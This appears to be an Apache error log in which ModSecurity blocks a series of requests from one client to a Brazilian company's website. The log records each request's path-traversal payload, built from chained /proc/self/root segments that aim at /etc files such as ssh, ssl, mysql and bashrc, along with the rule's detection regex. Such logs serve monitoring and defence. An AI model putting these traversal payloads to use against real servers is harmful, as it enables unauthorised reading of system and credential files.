[Wed Mar 18 11:07:24.801816 2026] [:error] [pid 15826:tid 140411716749056] [client 74.7.243.128:59100] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/bashrc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqxm-oXxyEfFpUF8f9xiwAAAUM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:07:25.977092 2026] [mime_magic:error] [pid 11816:tid 140411733534464] (70014)End of file found: [client 57.141.18.119:46462] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 11:07:27.326518 2026] [:error] [pid 17653:tid 140411548894976] [client 74.7.243.128:36080] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqxn8df6f5d65gmYZTZsgAAAtc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:07:33.031671 2026] [:error] [pid 17887:tid 140411548894976] [client 74.7.243.128:36086] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqxpQkwaGbbGflqUZAUOgAAANc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:07:34.388484 2026] [:error] [pid 17653:tid 140411649607424] [client 74.7.243.128:32780] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqxpsdf6f5d65gmYZTZvAAAAss"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:07:35.738989 2026] [:error] [pid 15051:tid 140411565680384] [client 74.7.243.128:32786] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqxpymAPhZkrhU8w4lxigAAAJU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:07:52.124571 2026] [:error] [pid 15826:tid 140411590858496] [client 74.7.243.128:32792] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqxuOoXxyEfFpUF8f9xoAAAAVI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:07:53.412327 2026] [:error] [pid 19507:tid 140411565680384] [client 74.7.243.128:34194] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqxudY0UrI5A3LftIyvfAAAAZU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:07:54.693101 2026] [:error] [pid 31803:tid 140411699963648] [client 74.7.243.128:34200] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqxuuyqAr6etmhZHNrE_QAAAEU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:07:56.114905 2026] [:error] [pid 30077:tid 140411683178240] [client 74.7.243.128:34214] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqxvPu8EFLIOrSqIpsH8AAAAkc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:07:57.503556 2026] [:error] [pid 15826:tid 140411683178240] [client 74.7.243.128:34216] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqxveoXxyEfFpUF8f9xpAAAAUc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:07:58.786964 2026] [:error] [pid 31803:tid 140411725141760] [client 74.7.243.128:34218] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqxvuyqAr6etmhZHNrFAAAAAEI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:08:00.135241 2026] [:error] [pid 26799:tid 140411557287680] [client 74.7.243.128:33254] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqxwNa6ubjKNq_cu4aevQAAA1Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:08:01.444443 2026] [:error] [pid 29882:tid 140411674785536] [client 74.7.243.128:33256] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqxwUzinOy1jxa1j4cZlQAAAQg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:08:04.242100 2026] [:error] [pid 17653:tid 140411540502272] [client 74.7.243.128:33264] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqxxMdf6f5d65gmYZTZygAAAtg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:08:05.554650 2026] [:error] [pid 17653:tid 140411666392832] [client 74.7.243.128:33268] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqxxcdf6f5d65gmYZTZzAAAAsk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:08:06.903449 2026] [:error] [pid 29882:tid 140411540502272] [client 74.7.243.128:33282] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqxxkzinOy1jxa1j4cZlwAAARg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:08:08.220116 2026] [:error] [pid 29882:tid 140411574073088] [client 74.7.243.128:33294] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqxyEzinOy1jxa1j4cZmgAAARQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:08:09.567509 2026] [:error] [pid 15826:tid 140411716749056] [client 74.7.243.128:41626] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqxyeoXxyEfFpUF8f9xrQAAAUM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:08:10.859005 2026] [:error] [pid 11816:tid 140411582465792] [client 74.7.243.128:41634] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqxyuw_le52K8_3pV3j5wAAAhM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:08:12.187212 2026] [:error] [pid 31803:tid 140411716749056] [client 74.7.243.128:41640] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqxzOyqAr6etmhZHNrFCAAAAEM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:08:14.615232 2026] [:error] [pid 29882:tid 140411691570944] [client 74.7.243.128:41650] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqxzkzinOy1jxa1j4cZoAAAAQY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
